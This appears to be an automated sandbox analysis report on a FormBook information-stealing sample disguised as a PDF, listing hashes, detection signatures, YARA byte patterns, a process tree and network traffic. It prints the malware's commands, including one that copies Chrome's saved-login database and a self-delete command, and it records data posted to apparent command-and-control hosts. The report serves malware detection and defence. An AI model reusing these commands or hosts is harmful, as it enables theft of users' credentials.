Analysis Report #Uc5f0#Uc554_190304,pdf.exe

Overview

General Information

Sample Name: #Uc5f0#Uc554_190304,pdf.exe
MD5: 5f42c48fa893d3787fbab422292c76c3
SHA1: d017e2ed84d8110bc6e1f8620715ede6da186cd9
SHA256: c67708cd06644c1fda26e6c0e4cfaaddf15634e8288ae451824c3083155a5192

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: File Created with System Process Name
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • #Uc5f0#Uc554_190304,pdf.exe (PID: 5324 cmdline: 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe' MD5: 5F42C48FA893D3787FBAB422292C76C3)
    • #Uc5f0#Uc554_190304,pdf.exe (PID: 5160 cmdline: 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe' MD5: 5F42C48FA893D3787FBAB422292C76C3)
      • explorer.exe (PID: 2864 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • chkdsk.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5328 cmdline: /c del 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 604 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • e2kdixix4hi0i2.exe (PID: 936 cmdline: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe MD5: 5F42C48FA893D3787FBAB422292C76C3)
          • e2kdixix4hi0i2.exe (PID: 4988 cmdline: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe MD5: 5F42C48FA893D3787FBAB422292C76C3)
        • NETSTAT.EXE (PID: 1512 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17649:$sqlite3step: 68 34 1C 7B E1
  • 0x1775c:$sqlite3step: 68 34 1C 7B E1
  • 0x17678:$sqlite3text: 68 38 2A 90 C5
  • 0x1779d:$sqlite3text: 68 38 2A 90 C5
  • 0x1768b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x177b3:$sqlite3blob: 68 53 D8 7F 8C
0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started, Author: Joe Security, Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\chkdsk.exe, ParentImage: C:\Windows\SysWOW64\chkdsk.exe, ParentProcessId: 4804, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 604
Sigma detected: File Created with System Process Name
Source: File created, Author: Sander Wiebing, Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 2864, TargetFilename: C:\Users\user\AppData\Local\Temp\Lp4ml

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Lp4ml\e2kdixix4hi0i2.exe, Virustotal: Detection: 30%
Multi AV Scanner detection for submitted file
Source: #Uc5f0#Uc554_190304,pdf.exe, Virustotal: Detection: 30%
Yara detected FormBook
Source: Yara match, File source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Lp4ml\e2kdixix4hi0i2.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: #Uc5f0#Uc554_190304,pdf.exe, Joe Sandbox ML: detected
Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe, Code function: 0_2_004083DC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_004083DC
Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe, Code function: 0_2_00405088 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405088

Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe, Code function: 4x nop then push 004659A0h, 0_2_0045E23C
Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe, Code function: 4x nop then push 00000000h, 0_2_0045E23C
Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe, Code function: 4x nop then call 00406074h, 0_2_004659F4
Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe, Code function: 4x nop then push 00000000h, 0_2_004659F4

          Networking:

Uses netstat to query active network connections and open ports
Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic, HTTP traffic detected: GET /6dk/?4hG=le9ZFLPtKd8NP4oRc571WO4/dkAOUpI85HqTFH+oaVijRcBtEnjxc5iWZQM7UUOD057V&S2=vzrtEjS8dTOt0 HTTP/1.1 | Host: www.sweetandsunny.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /6dk/?4hG=pg/jUtKomc/L4vhxH/kMeK3wbZstWx/FEKb2uJAMbWIhCvL1z2faZ29JSnFivOU2cy63&S2=vzrtEjS8dTOt0 HTTP/1.1 | Host: www.elizavetakalinina.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, ASN Name: unknown unknown
Source: global traffic, HTTP traffic detected: POST /6dk/ HTTP/1.1 | Host: www.elizavetakalinina.com | Connection: close | Content-Length: 409 | Cache-Control: no-cache | Origin: http://www.elizavetakalinina.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.elizavetakalinina.com/6dk/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: 4hG=hCzZKN(I6pm9tNkkRJJHPabTNbQeV1n5Y_KJ9p8yTGUdO7Ku6TefbzQ2Pk9phe46UR3nWU0LghGLZnzAE5gUDnGktsSHPAQNi1kjxmuZsuzunQSgNaDgbD39qMHrQQj-gKzV0kk10Paz96ybnL9zhbv25sfr4-VI8sq9KqeRBk5AAVrClhZBS_(_Hv2KJJKhRyYXePiQYrQQDJQkfZ07csU56DPyub1hMqtGG9NroSUWMm8R8zTNciyJkgXSmuG5O2weoUJ1nW5VYcks2T06f5ChIxPtxGKtj1fhbpD7OzEKr2jcicM9L8MWOdNLOpCSTIGKoozDoxU3uO1YjYHV435W~GYyM09zDTEvBhsdHUjMopjjYGtYcn87kUYTpTpP6GPiGym_wItMnEFAsQ).
Source: global traffic, HTTP traffic detected: POST /6dk/ HTTP/1.1 | Host: www.elizavetakalinina.com | Connection: close | Content-Length: 158229 | Cache-Control: no-cache | Origin: http://www.elizavetakalinina.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.elizavetakalinina.com/6dk/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: unknown, DNS traffic detected: queries for: www.caishenhou.com
Source: unknown, HTTP traffic detected: POST /6dk/ HTTP/1.1 | Host: www.elizavetakalinina.com | Connection: close | Content-Length: 409 | Cache-Control: no-cache | Origin: http://www.elizavetakalinina.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.elizavetakalinina.com/6dk/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: 4hG=hCzZKN(I6pm9tNkkRJJHPabTNbQeV1n5Y_KJ9p8yTGUdO7Ku6TefbzQ2Pk9phe46UR3nWU0LghGLZnzAE5gUDnGktsSHPAQNi1kjxmuZsuzunQSgNaDgbD39qMHrQQj-gKzV0kk10Paz96ybnL9zhbv25sfr4-VI8sq9KqeRBk5AAVrClhZBS_(_Hv2KJJKhRyYXePiQYrQQDJQkfZ07csU56DPyub1hMqtGG9NroSUWMm8R8zTNciyJkgXSmuG5O2weoUJ1nW5VYcks2T06f5ChIxPtxGKtj1fhbpD7OzEKr2jcicM9L8MWOdNLOpCSTIGKoozDoxU3uO1YjYHV435W~GYyM09zDTEvBhsdHUjMopjjYGtYcn87kUYTpTpP6GPiGym_wItMnEFAsQ).
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: aruba-proxy | Date: Thu, 28 May 2020 03:55:44 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Pragma: no-cache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://www.elizavetakalinina.com/wp-json/>; rel="https://api.w.org/" | Set-Cookie: PHPSESSID=376rpn6oase94253u3k1ot3ka7; path=/
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.1167784770.0000000003230000.00000004.00000001.sdmp, String found in binary or memory: http://ns.microsoftom/photo/1.2/tD
Source: explorer.exe, 00000003.00000002.1791418593.00000000030D0000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: chkdsk.exe, 00000004.00000002.1792417186.0000000005E09000.00000004.00000001.sdmp, String found in binary or memory: http://www.elizavetakalinina.com
Source: chkdsk.exe, 00000004.00000002.1792417186.0000000005E09000.00000004.00000001.sdmp, String found in binary or memory: http://www.elizavetakalinina.com/6dk/
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 00000004.00000002.1792598460.00000000060FF000.00000004.00000001.sdmp, String found in binary or memory: https://www.sweetandsunny.com/6dk/?4hG=le9ZFLPtKd8NP4oRc571WO4/dkAOUpI85HqTFH

Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe, Code function: 0_2_00420B44 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 0_2_00420B44
Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe, Code function: 0_2_0043E138 GetKeyboardState, 0_2_0043E138

          E-Banking Fraud:

          Yara detected FormBookShow sources
          Source: Yara match | File source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\chkdsk.exe | Dropped file: C:\Users\user\AppData\Roaming\03P50U3A\03Plogri.ini
          Source: C:\Windows\SysWOW64\chkdsk.exe | Dropped file: C:\Users\user\AppData\Roaming\03P50U3A\03Plogrf.ini
          Source: C:\Windows\SysWOW64\chkdsk.exe | Dropped file: C:\Users\user\AppData\Roaming\03P50U3A\03Plogrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
